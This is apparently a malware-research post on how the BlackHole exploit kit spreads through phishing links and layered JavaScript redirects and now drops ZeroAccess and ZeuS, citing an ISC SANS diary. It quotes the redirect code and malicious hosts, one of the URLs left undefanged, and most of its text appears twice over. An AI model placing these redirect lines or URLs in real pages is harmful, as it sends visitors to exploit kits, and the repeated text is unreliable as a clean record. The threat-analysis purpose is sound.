I looked MDL today and suddenly discovered the following:
![]()
New method of BlackHole spreading. js has the form:
document.location='http://westarray.com/main.php?page=a68ea0edbb97ee5c';
ISC wrote about that and that BlackHole spreads ZeroAccess/Sirefef now.
Further, information from this note http://isc.sans.edu/diary/Updates+on+ZeroAccess+and+BlackHole+front+/12079
So, the first update I would like to bring is the new resilient infrastructure adopted by the BlackHole Exploit Kit.
![]()
BlackHole panel
The most common method used by BlackHole to spread is via links inside phishing emails.
For example:
1) Phishing email contains a link to a website
2) The website contains a redirection to a BH website
But recently they improved this method by adding another layer:
1) Phishing email contains a link to a website
2) The website contains four links like:
#h1#WAIT PLEASE#/h1#
#h3#Loading...#/h3#
#script language="JavaScript" type="text/JavaScript" src="hXXp://www.kvicklyhelsinge[.]dk/js.js"##/script#
#script language="JavaScript" type="text/JavaScript" src="hXXp://michellesflowersltd[.]co.uk/js.js"##/script#
#script language="JavaScript" type="text/JavaScript" src="hXXp://myescortsdirectory[.]com/js.js"##/script#
#script language="JavaScript" type="text/JavaScript" src="hXXp://nitconnect[.]net/js.js"##/script#
3) Each JS.JS contains a redirection to a final website that contains the BH Exploit kit:
-> document.location='hXXp://matocrossing[.]com/main.php?page=206133a43dda613f';
That makes really easy for the author to update to new websites, and at the same time, make it harder for a takedown.
After that you already know what happens, it will check your system and select the best exploit for it, like a PDF exploit.
For some time it was mostly delivering FakeAV and infostealer trojans, like ZeuS and Spyeye, but just recently it started to change...
That bring us to the second update: ZeroAccess
ZeroAccess it not something new...in fact it is been around for some years, but it is showing some very interesting development. One recent BH exploit kit is delivering a Downloader trojan. This downloader is then downloading two additional trojans, a ZeroAccess and a ZeuS trojan.
New method of BlackHole spreading. js has the form:
document.location='http://westarray.com/main.php?page=a68ea0edbb97ee5c';
ISC wrote about that and that BlackHole spreads ZeroAccess/Sirefef now.
Further, information from this note http://isc.sans.edu/diary/Updates+on+ZeroAccess+and+BlackHole+front+/12079
So, the first update I would like to bring is the new resilient infrastructure adopted by the BlackHole Exploit Kit.
The most common method used by BlackHole to spread is via links inside phishing emails.
For example:
1) Phishing email contains a link to a website
2) The website contains a redirection to a BH website
But recently they improved this method by adding another layer:
1) Phishing email contains a link to a website
2) The website contains four links like:
#h1#WAIT PLEASE#/h1#
#h3#Loading...#/h3#
#script language="JavaScript" type="text/JavaScript" src="hXXp://www.kvicklyhelsinge[.]dk/js.js"##/script#
#script language="JavaScript" type="text/JavaScript" src="hXXp://michellesflowersltd[.]co.uk/js.js"##/script#
#script language="JavaScript" type="text/JavaScript" src="hXXp://myescortsdirectory[.]com/js.js"##/script#
#script language="JavaScript" type="text/JavaScript" src="hXXp://nitconnect[.]net/js.js"##/script#
3) Each JS.JS contains a redirection to a final website that contains the BH Exploit kit:
-> document.location='hXXp://matocrossing[.]com/main.php?page=206133a43dda613f';
That makes really easy for the author to update to new websites, and at the same time, make it harder for a takedown.
After that you already know what happens, it will check your system and select the best exploit for it, like a PDF exploit.
For some time it was mostly delivering FakeAV and infostealer trojans, like ZeuS and Spyeye, but just recently it started to change...
That bring us to the second update: ZeroAccess
ZeroAccess it not something new...in fact it is been around for some years, but it is showing some very interesting development. One recent BH exploit kit is delivering a Downloader trojan. This downloader is then downloading two additional trojans, a ZeroAccess and a ZeuS trojan.
